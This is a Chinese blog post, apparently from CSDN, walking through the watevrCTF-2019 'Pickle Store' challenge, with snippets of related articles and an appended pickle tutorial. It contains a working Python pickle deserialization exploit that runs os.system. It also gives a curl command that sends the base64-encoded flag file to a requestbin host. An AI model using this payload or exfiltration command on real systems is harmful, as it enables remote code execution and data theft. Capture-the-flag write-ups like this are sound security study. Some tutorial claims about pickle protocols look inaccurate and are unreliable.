[watevrCTF-2019]Pickle Store pickle序列化漏洞~~

最新推荐文章于 2024-06-24 15:00:36 发布
最新推荐文章于 2024-06-24 15:00:36 发布
阅读量1.7k 收藏
点赞数
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/104277233
版权

题目介绍

在这里插入图片描述要有1000美元买flag,然后我们查看header,扫目录之类的操作,最后在cookie中发现问题~~

gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu

先试试base64解码~~
在这里插入图片描述可以看见有些关键词还是很明显的,要么是经过某种加密,或者处理~~
根据题目pickle的提示,我们用python的pickle库去loads一下~~
在这里插入图片描述我开始以为是要伪造cookie,让money变成1000以上就能购买flag了,但是pickle有key加密处理,这种加密方式为hmac,尝试过爆破,无果~~
最后在网上看见了pickle的反序列化的漏洞~~

exp

import _pickle as cPickle
import sys
import base64

COMMAND = sys.argv[1]

class PickleRce(object):
    def __reduce__(self):
        import os
        return (os.system,(COMMAND,))

print base64.b64encode(cPickle.dumps(PickleRce()))

这段代码就是我们的exp
执行方式为

python3 script.py 命令

windows和linux的运行方式不一样,由于服务器实在linux上,所以我们也必须在linux上运行这段代码~~
然后替换cookie,虽然会报500错误,但是命令还是执行了,我们找个vps,直接把数据带出来就行了

python3 posix.py "curl http://http.requestbin.buuoj.cn/1fl5yzt1?a=\`cat flag.txt |base64\`"

相关总结

python序列化还有一个库叫做marshal,也存在相关漏洞~~
有时后pickle时,题目会以黑名单限制,这个时候我们可以用map绕过~~

参考链接

简书
tr1ple师傅
hmac爆破

HyyMbb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[watevrCTF-2019]Pickle Store
Kradress的博客
02-11 1820
目录思路题解总结 思路 先抓个包看看,里面有个session base64解码后拿到一串乱码,根据题目可以得知考点是pickle序列 import base64 import pickle print(pickle.loads(base64.b64decode("gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTY
Python pickle模块实现对象序列
12-31
这篇文章主要介绍了Python pickle模块实现对象序列,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 作用 对Python对象进行序列,便于存储和传输 Python...
[watevrCTF-2019]Pickle StorePickle序列
D.MIND 的博客
04-29 1732
文章目录Pickle序列简单字符类型的反序列类的反序列`__reduce__`命令行下输入命令:python下反弹shell一、curl+base64二、curl -d三、nc 反弹shell 一进来看看Cookie处,果然又是一个session gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGVi
详解python pickle中的反序列漏洞
最新发布
公众号:该用户快成仙了
06-24 869
序列过程有漏洞:如果我们反序列了一个不可信的数据源,那就可能引发反序列攻击。攻击者可以在序列的数据里嵌入恶意代码,当你反序列这个数据时,这些恶意代码就会被执行,可能会导致数据泄露、系统崩溃,甚至让攻击者远程控制你的系统。Pickle模块是Python自带的,它主要用来序列和反序列Python对象。你可以用Pickle把任何Python对象(包括复杂的数据结构)保存成字节流,然后在需要的时候再加载回来。Pickle的工作原理Pickle的工作原理其实很简单。
BUUCTF--[watevrCTF-2019]Pickle Store
qq_46263951的博客
08-08 396
一般看到商店需要购买flag的直接就会想到session和cookie 我们先将session的值来接
CTF题型 Python中pickle序列进阶利用&例题&opache绕过(1)
05-15 261
🍅 硬核资料:关注即可领取PPT模板、简历模板、行业经典书籍PDF。🍅 技术互助:技术群大佬指点迷津,你的问题可能不是问题,求资源在群里喊一声。🍅 面试题库:由技术群里的小伙伴们共同投稿,热乎的大厂面试真题,持续更新中。🍅 知识体系:含编程语言、算法、大数据生态圈组件(Mysql、Hive、Spark、Flink)、数据仓库、Python、前端等等。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统学习资料的朋友,可以戳这里获取。
python pickle序列漏洞_渗透测试 - 黑客技术 | 【技术分享】记CTF比赛中发现的Python反序列漏洞_吾爱漏洞...
weixin_39618121的博客
12-12 628
写在前面的话在前几天,我有幸参加了ToorConCTF(https://twitter.com/toorconctf),而在参加此次盛会的过程中我第一次在Python中发现了序列漏洞。在我们的比赛过程中,有两个挑战中涉及到了能够接受序列对象的Python库,而我们通过研究发现,这些Python库中存在的安全漏洞将有可能导致远程代码执行(RCE)。由于我发现网上关于这方面的参考资料非常散乱,查找...
Python3.5 Json与pickle实现数据序列与反序列操作示例
09-19
这里主要讨论两种常见的序列库:Json和pickle。 1. Json: Json (JavaScript Object Notation) 是一种轻量级的数据交换格式,易于人阅读和编写,同时也易于机器解析和生成。在Python3.5中,可以使用`json`模块来...
Python使用pickle进行序列和反序列的示例代码
09-24
Python的pickle库是一个强大的工具,用于对象的序列和反序列序列是将Python对象转换为字节流的过程,而反序列则是将字节流恢复为原来的Python对象。这个过程允许我们将复杂的对象结构保存到文件或通过网络...
Python序列与反序列pickle用法实例
09-18
在Python中,`pickle`模块提供了一个强大的序列和反序列的实现。 序列是将Python对象转为字节流的过程。在这个过程中,`pickle`模块会将对象的所有属性和结构转换为二进制数据。在上述例子中,`Bird`类的...
python反序列-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 885
详细讲解pickle
自制人工智能TensorFlow之04 pickle序列与反序列
iCloudEnd的博客
03-09 828
自制人工智能TensorFlow之04 pickle序列与反序列 在机器学习中,我们常常需要把训练好的模型存储起来,这样在进行决策时直接将模型读出,而不需要重新训练模型,这样就大大节约了时间。Python提供的pickle模块就很好地解决了这个问题,它可以序列对象并保存到磁盘中,并在需要的时候读取出来,任何对象都可以执行序列操作。 demo #co...
CTF逆向-[watevrCTF 2019]esreveR-看似复杂流程,发现核心逻辑,按64位架构导出栈中和寄存器中的值得到结果
serfend's blog
05-07 2206
CTF逆向-[watevrCTF 2019]esreveR-看似复杂流程,发现核心逻辑,按64位架构导出栈中和寄存器中的值得到结果 来源:https://buuoj.cn/ 内容: 附件:https://pan.baidu.com/s/1CL9SAiLOT6Y1aPuVq1tYOw?pwd=hsd5 提取码:hsd5 答案:watevr{esrever_reversed_youtube.com/watch?v=I8ijb4Zee5E} 总体思路 用ida打开发现默认是按com加载,但该文件是elf文件,故
watevrCTF 2019 Voting Machine 1
2301_79793667的博客
12-12 81
发现了危险函数gets,通过输入v4的值可以达成溢出,shift+f12还发现了一个打开flag文本的指令,可以将溢出点导到此处。recvall接取数据流,赋值给flag,打印flag就能看到flag。直接进行nc连接,根据提示随意输入一个数字,发现会被弹出程序交互。那我们检查一下附件,然后用ida打开。打开flag文本的指令的地址为。首先打开环境,下载附件。
pickle序列漏洞浅析
Derait的博客
08-07 1037
pickle序列漏洞浅析 Pickle库及函数 pickle是python语言的一个标准模块,实现了基本的数据序列和反序列pickle模块是以二进制的形式序列后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列为bytes对象 dump 对象反序列到文件对象,存入文件 loads 从bytes对象反序列 load 对象反序列,从文件中读取数据 先通过几个例子来看下这几个函数的作用: dump/load
[CTF]CTFSHOW反序列
Sapphire037的博客
01-20 3766
265 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # @Last Modified by: h1xa # @Last Modified time: 2020-12-05 00:17:08 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); include('flag.php');
BUUCTF--[watevrCTF-2019]Supercalc
qq_46263951的博客
08-12 308
打开页面后发现其功能是进行计算 使用jwt解析可以发现我们所提交的内容在session中 通过1/0进行报错,用#注释来进行绕过, 执行命令可以得到加密session时所需的key 根据上面的测试我们可以知道这里是一个Flask_SSTI,所以使用flask-session-cookie加密脚本 使用ls命令查看当前目录下的所有文件 python3 flask_session_cookie_manager3.py encode -s "cded826a1e89925035cc05f09078..
python pickle序列漏洞_Python Pickle序列漏洞
weixin_39635432的博客
12-08 262
Python序列与反序列Python 的序列和反序列是将一个类对象向字节流转从而进行存储和传输,然后使用的时候再将字节流转回原始的对象的一个过程几个重要函数Pickle.dump():将Python对象序列保存到本地的文件中。Pickle.load():载入本地文件,将文件内容反序列为Python对象。Pickle.dumps():将Python对象序列为字符串。Pickle.l...
python pickle protocol_Python序列pickle模块使用详解
05-13
Python的pickle模块是用来实现序列的,即将Python中的对象转换成字节流,方便存储和传输。pickle模块支持多种协议,其中协议0是最早的版本,协议1和协议2是Pyhton2中引入的,协议3是Python3.0中引入的,协议4是Python3.4中引入的,每个协议都有其特点和适用范围。 下面我们来详细了解一下pickle模块的使用方法和各个协议的特点。 ## 基本用法 pickle模块提供了dumps、dump、loads和load四个函数,分别用来进行序列和反序列操作。其中dumps和loads函数可以直接将对象转换成字节流或将字节流转换成对象,而dump和load函数则可以将对象序列到文件或从文件中反序列对象。 ### 序列 将Python对象转换成字节流的过程称为序列,可以使用dumps函数实现: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} bytes_data = pickle.dumps(data) print(bytes_data) ``` 输出结果为: ``` b'\x80\x04\x95\x17\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04name\x94\x8c\x03Tom\x94\x8c\x03age\x94K\x12\x8c\x06gender\x94\x8c\x04male\x94u.' ``` 可以看到,data字典被转换成了一串二进制的字节流。 ### 反序列 将字节流转换成Python对象的过程称为反序列,可以使用loads函数实现: ```python import pickle bytes_data = b'\x80\x04\x95\x17\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04name\x94\x8c\x03Tom\x94\x8c\x03age\x94K\x12\x8c\x06gender\x94\x8c\x04male\x94u.' data = pickle.loads(bytes_data) print(data) ``` 输出结果为: ``` {'name': 'Tom', 'age': 18, 'gender': 'male'} ``` ### 文件操作 除了使用dumps和loads函数进行序列和反序列操作外,pickle模块还提供了dump和load函数用于将对象序列到文件或从文件中反序列对象。 将对象序列到文件: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'wb') as f: pickle.dump(data, f) ``` 从文件中反序列对象: ```python import pickle with open('data.pkl', 'rb') as f: data = pickle.load(f) print(data) ``` ## 协议0 协议0是最早的版本,它使用ASCII码来表示序列后的对象,因此序列后的数据比较大。使用协议0时,可以指定文件打开模式为't',表示以文本模式打开文件: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'wt') as f: pickle.dump(data, f, protocol=0) with open('data.pkl', 'rt') as f: data = pickle.load(f) print(data) ``` 输出结果为: ``` {'age': 18, 'gender': 'male', 'name': 'Tom'} ``` ## 协议1 协议1和协议2是Python2中引入的,它们使用更紧凑的二进制格式表示序列后的对象。协议1可以指定文件打开模式为'wb',表示以二进制模式打开文件: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'wb') as f: pickle.dump(data, f, protocol=1) with open('data.pkl', 'rb') as f: data = pickle.load(f) print(data) ``` 输出结果为: ``` {'name': 'Tom', 'age': 18, 'gender': 'male'} ``` ## 协议2 协议2是协议1的改进版本,它支持新的对象类型,如集合、字典等。在Python2中,协议2是默认使用的协议,如果不指定协议号,则使用协议2。 在Python3中,pickle模块默认使用协议3,但仍然可以使用协议2: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'wb') as f: pickle.dump(data, f, protocol=2) with open('data.pkl', 'rb') as f: data = pickle.load(f) print(data) ``` 输出结果为: ``` {'name': 'Tom', 'age': 18, 'gender': 'male'} ``` ## 协议3 协议3是Python3.0中引入的,它支持更多的对象类型,如bytes、bytearray、set等。在Python3中,协议3是默认使用的协议,因此可以省略protocol参数: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'wb') as f: pickle.dump(data, f) with open('data.pkl', 'rb') as f: data = pickle.load(f) print(data) ``` 输出结果为: ``` {'name': 'Tom', 'age': 18, 'gender': 'male'} ``` ## 协议4 协议4是Python3.4中引入的,它支持更多的对象类型,如memoryview、tuple等。协议4还支持从流中读取指定长度的数据,从而避免了一次性读取太多数据导致内存溢出的问题。 使用协议4时,需要将文件打开模式指定为'xb',表示以二进制模式打开文件,并且不能使用文本模式: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'xb') as f: pickle.dump(data, f, protocol=4) with open('data.pkl', 'rb') as f: data = pickle.load(f) print(data) ``` 输出结果为: ``` {'name': 'Tom', 'age': 18, 'gender': 'male'} ``` ## 注意事项 在使用pickle模块时,需要注意以下几点: - 序列和反序列的对象必须是可序列的,即不能包含不能序列的对象。 - 序列和反序列的对象必须是相同的类型,否则可能会出现错误。 - 序列和反序列的对象必须是可信的,否则可能会被注入恶意代码。 - 不同协议之间的兼容性不同,不同协议之间的序列和反序列操作不一定是互逆的。因此,在使用不同协议时,需要注意协议号的兼容性和相应的操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值